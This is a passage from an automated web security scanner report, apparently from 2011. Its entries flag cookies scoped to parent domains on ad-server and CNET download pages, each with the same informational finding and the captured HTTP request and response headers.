Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:16:53 GMT
Connection: close


10.12. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerSource.asp?FlightID=1901699&Page=&PluID=0&EyeblasterID=4165551&Pos=000000087871816&ord=[timestamp] HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A2=; B2=; u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; E2=0a+r820wsG02WG820wsG09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingRes/Site-27742/Type-0/f4bbb00d-1a47-45b5-bf52-f968c23d96e3.jpg
Server: Microsoft-IIS/7.5
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=fU+La5OV0a+r0000820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7gi30820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0uO9820wsI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0uO9002P820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0a+rg410sI02WG820wsG09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_000000087871816=4165551
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:17:26 GMT
Connection: close


10.13. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4164202%7E%7E0%5EebAdDuration%7E18%7E0%7E1%7E0%7E2%7E0%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.9409657982178032&flv=10.1103&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Origin: http://www.theregister.co.uk
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=f7d1a9e2-ffff-4620-9a6f-d4ba2248bf353G9020; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=f7d1a9e2-ffff-4620-9a6f-d4ba2248bf353G9020; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:00:24 GMT
Connection: close
Content-Length: 0


10.14. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1922091&PluID=0&w=300&h=600&ord=3092481&ncu=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3a8a/3/0/%2a/f%3B232232804%3B0-0%3B1%3B13500656%3B4252-336/280%3B39182405/39200192/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A2=gn3Ka4JO09MY00008y8ysFfU+La50V0a+r0000820wsG; B2=83xP08y8ysF7gi30820wsG; C3=0u3F8y8ysF0000040_0uO9820wsG0000002_; D3=0u3F00358y8ysF0uO9002P820wsG; E2=0a+r820wsG09MY8y8ysF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=gn3Ka4JO09MY00008y8ysFfU+La50V0a+r0000820wsGfUFGa5OE02WG0000820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7lgH0820wsI83xP08y8ysF7gi30820wsG; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0uP4820wsI000w000_0u3F8y8ysF0000040_0uO9820wsG0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0uP402HA820wsI0u3F00358y8ysF0uO9002P820wsG; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0a+r820wsG02WG820wsI09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:00:25 GMT
Connection: close
Content-Length: 2868

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

10.15. http://download.cnet.com/1770-20_4-0.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /1770-20_4-0.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1770-20_4-0.html HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:14 GMT
Via: HTTP/1.0 phx1-rb-dl-app1.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: nb
Expires: Wed, 12 Jan 2011 13:01:01 GMT
Edge-Control: max-age=300
Age: 313
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:14 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:14 GMT
Set-Cookie: arrowLat=1294837274322; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:14 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:14 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:14 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:14 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:19 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:14 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=300
Keep-Alive: timeout=15, max=994
Connection: Keep-Alive
Content-Length: 39010

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <!-- Yoda loves you -->
<head> <title>Search -
...[SNIP]...

10.16. http://download.cnet.com/8300-2007_4-12.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /8300-2007_4-12.xml

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /8300-2007_4-12.xml HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:14 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app5.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en-US
Expires: Wed, 12 Jan 2011 13:05:20 GMT
Edge-Control: max-age=360
Age: 115
Content-Type: text/xml;charset=UTF-8
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:14 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:14 GMT
Set-Cookie: arrowLat=1294837275148; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:14 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:14 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:14 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:14 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:19 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:14 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=360
Keep-Alive: timeout=15, max=994
Connection: Keep-Alive
Content-Length: 55525

<?xml version="1.0" encoding="UTF-8"?>


<!-- young tee -->


<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<link>http://download.cnet
...[SNIP]...

10.17. http://download.cnet.com/8301-2007_4-20015771-12.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /8301-2007_4-20015771-12.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /8301-2007_4-20015771-12.html HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:19 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app5.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en-US
Expires: Wed, 12 Jan 2011 13:00:36 GMT
Edge-Control: max-age=360
Age: 404
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:19 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:19 GMT
Set-Cookie: arrowLat=1294837280385; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:19 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:19 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:19 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:19 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:24 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:19 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=360
Keep-Alive: timeout=15, max=943
Connection: Keep-Alive
Content-Length: 76026

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Yoda loves you -->
<head> <title>Trend Micro bets on the cloud | The Download Blog - Downl
...[SNIP]...

10.18. http://download.cnet.com/8301-2007_4-20027809-12.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /8301-2007_4-20027809-12.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /8301-2007_4-20027809-12.html HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:34:47 GMT
Via: HTTP/1.0 phx1-rb-dl-app9.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 03:40:47 GMT
Edge-Control: max-age=360
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 04:04:47 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 03:34:47 GMT
Set-Cookie: arrowLat=1294803287158; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 03:34:47 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 03:34:47 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 04:34:47 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 03:35:47 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 03:34:52 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 03:35:47 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=360
Keep-Alive: timeout=15, max=984
Connection: Keep-Alive
Content-Length: 69379

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Yoda loves you -->
<head> <title>Android lands cloud security from Trend Micro | The Downl
...[SNIP]...

10.19. http://download.cnet.com/8301-2007_4-20027809-12.html--  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /8301-2007_4-20027809-12.html--

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /8301-2007_4-20027809-12.html-- HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:24 GMT
Via: HTTP/1.0 phx1-rb-dl-app7.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 13:07:24 GMT
Edge-Control: max-age=360
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:24 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:24 GMT
Set-Cookie: arrowLat=1294837284526; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:24 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:24 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:24 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:24 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:29 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:24 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=360
Keep-Alive: timeout=15, max=996
Connection: Keep-Alive
Content-Length: 75826

<!DOCTYPE html>


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Yoda loves you -->
<head>


<title>Android lands cloud se
...[SNIP]...

10.20. http://download.cnet.com/8301-2007_4-20027865-12.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /8301-2007_4-20027865-12.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /8301-2007_4-20027865-12.html HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:32 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app9.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 13:07:32 GMT
Edge-Control: max-age=360
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:32 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:32 GMT
Set-Cookie: arrowLat=1294837292036; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:32 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:32 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:32 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:32 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:37 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:32 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=360
Keep-Alive: timeout=15, max=943
Connection: Keep-Alive
Content-Length: 64987

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Yoda loves you -->
<head> <title>It's a black-and-white world: iPhone apps of the week | T
...[SNIP]...

10.21. http://download.cnet.com/download-blog/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /download-blog/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download-blog/ HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:47 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app1.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 13:05:47 GMT
Cache-Control: max-age=240, stale-if-error=86400
X-CNET-HEADERREMOVE: Cache-Control
X-CNET-HEADER-Cache-Control: max-age=240
Edge-Control: max-age=240
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:47 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:47 GMT
Set-Cookie: arrowLat=1294837306898; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:47 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:47 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:47 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:47 GMT
